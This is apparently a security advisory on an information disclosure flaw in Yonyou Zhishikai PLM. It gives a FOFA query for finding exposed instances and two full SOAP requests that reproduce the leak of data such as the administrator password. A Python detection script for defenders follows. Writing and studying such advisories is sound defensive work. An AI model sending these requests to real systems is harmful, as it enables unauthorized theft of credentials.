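Yonyou Zhishikai PLM (用友智石开PLM) getWorkGroups Information Disclosure Vulnerability
1. Vulnerability Overview
The Zhishikai solution for the high-tech and electronics industry helps enterprises in that sector build a standardized R&D information management system, replacing the outdated practice of relying mainly on people to manage product R&D project workflows and product documentation. It helps enterprises standardize the management of the product R&D project process, improve their product R&D quality system, and raise their project management level and product innovation capability. It also helps enterprises achieve unified management and sharing of product R&D project workflows and R&D data. The getWorkGroups operation of Yonyou Zhishikai PLM has an information disclosure vulnerability through which an attacker can obtain sensitive information such as the administrator password.
2. Affected Versions
- Yonyou Zhishikai PLM
3. Asset Mapping
- fofa
body="智石开PLM"
- Fingerprint
4. Vulnerability Reproduction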
POST /services/MessageService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host:
Content-Length: 208

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mes="MessageService">
<soapenv:Header/>
<soapenv:Body>
<mes:getWorkGroups/>
</soapenv:Body>
</soapenv:Envelope>

POST /services/WorkGroupService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: Secure; JSESSIONID=9424E6CE26117CA8A1D223E13DD6E34A; Secure
Upgrade-Insecure-Requests: 1
Priority: u=1
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host:
Content-Length: 210

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wor="WorkGroupService">
<soapenv:Header/>
<soapenv:Body>
<wor:getWorkGroups/>
</soapenv:Body>
</soapenv:Envelope>
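
For defenders, a detection sketch for the two requests above. It is an added example, not part of the original advisory or the vendor's code, and it flags captured requests that invoke getWorkGroups on either service path. The host name, the session value, the sample captures and the "no JSESSIONID cookie" triage heuristic are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Endpoints and operation name are the ones in the requests on this page.
SERVICE_PATHS = {"/services/MessageService", "/services/WorkGroupService"}
OPERATION = "getWorkGroups"
SOAP_BODY = "{http://schemas.xmlsoap.org/soap/envelope/}Body"

def parse_request(raw):
    """Split a captured raw HTTP request into method, path, headers, body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if malformed
    headers = {n.strip().lower(): v.strip()
               for n, _, v in (line.partition(":") for line in lines[1:])}
    return method, target.split("?", 1)[0], headers, body.strip()

def soap_operation(body):
    """Local name of the first element inside soapenv:Body, or None."""
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        return None  # captured bodies are untrusted: never parse DTDs
    try:
        soap_body = ET.fromstring(body).find(SOAP_BODY)
    except ET.ParseError:
        return None
    if soap_body is None or len(soap_body) == 0:
        return None
    return soap_body[0].tag.rsplit("}", 1)[-1]

def classify(raw):
    """Finding dict for a getWorkGroups call to a listed service, else None.
    has_session=False (no JSESSIONID cookie) is the higher-priority alert."""
    try:
        method, path, headers, body = parse_request(raw)
    except ValueError:
        return None
    if (method != "POST" or path not in SERVICE_PATHS
            or soap_operation(body) != OPERATION):
        return None
    has_session = "jsessionid=" in headers.get("cookie", "").lower()
    return {"path": path, "has_session": has_session}

# Constructed sample captures; host and session value are placeholders.
_ENV = ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:m="X"><s:Header/><s:Body><m:%s/></s:Body></s:Envelope>')
_HDR = "Host: plm.example.internal\r\nContent-Type: text/xml\r\n"
_COOKIE = "Cookie: JSESSIONID=PLACEHOLDER\r\n"
SAMPLES = [
    "POST /services/MessageService HTTP/1.1\r\n" + _HDR + "\r\n" + _ENV % OPERATION,
    "POST /services/WorkGroupService HTTP/1.1\r\n" + _HDR + _COOKIE + "\r\n" + _ENV % OPERATION,
    "POST /services/MessageService HTTP/1.1\r\n" + _HDR + "\r\n" + _ENV % "otherOperation",
]
```

The operation is matched on the parsed SOAP body rather than a substring, so namespace prefixes other than `mes:` or `wor:` are still caught. The path comparison is exact, so normalize case and encoding upstream if the proxy or WAF feeding it does not.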